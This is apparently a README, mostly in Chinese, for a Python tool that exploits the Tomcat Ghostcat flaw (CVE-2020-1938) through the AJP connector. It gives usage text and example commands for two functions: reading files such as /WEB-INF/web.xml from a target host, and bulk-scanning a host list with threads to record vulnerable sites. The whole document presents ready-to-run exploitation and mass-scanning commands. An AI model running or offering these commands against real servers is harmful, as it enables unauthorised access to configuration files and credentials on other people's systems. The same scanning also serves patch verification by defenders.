首先感谢hypn0s提供的AJP协议请求构造的工具AJPY(一个python库),本项目在此基础上实现批量检测幽灵猫漏洞站点。
暂时拥有两种功能
usage: tomcat.py [-h] {read_file,scan_files} ...
positional arguments:
{read_file,scan_files}
read_file Exploit CVE-2020-1938
scan_files scan a file list
optional arguments:
-h, --help show this help message and exit
- 文件读取
usage: tomcat.py read_file [-h] [-H HOST] [-p PORT] [--webapp WEBAPP]
[-f FILE]
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST The host to check
-p PORT, --port PORT The port of AJP connector(default is 8009)
--webapp WEBAPP webapp
-f FILE, --file FILE The relative path of file to read
python3 tomcat.py read_file -H 127.0.0.1 --webapp manager -f /WEB-INF/web.xml
- 检测文件中所有站点
usage: tomcat.py scan_files [-h] [-f FILE] [-t THREADS] [-o OUT]
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Host list(only one url in a line)
-t THREADS, --threads THREADS
-o OUT, --out OUT output the vulnerable host to file
python3 tomcat.py scan_files -t 5 -f host_files.txt -o result.txt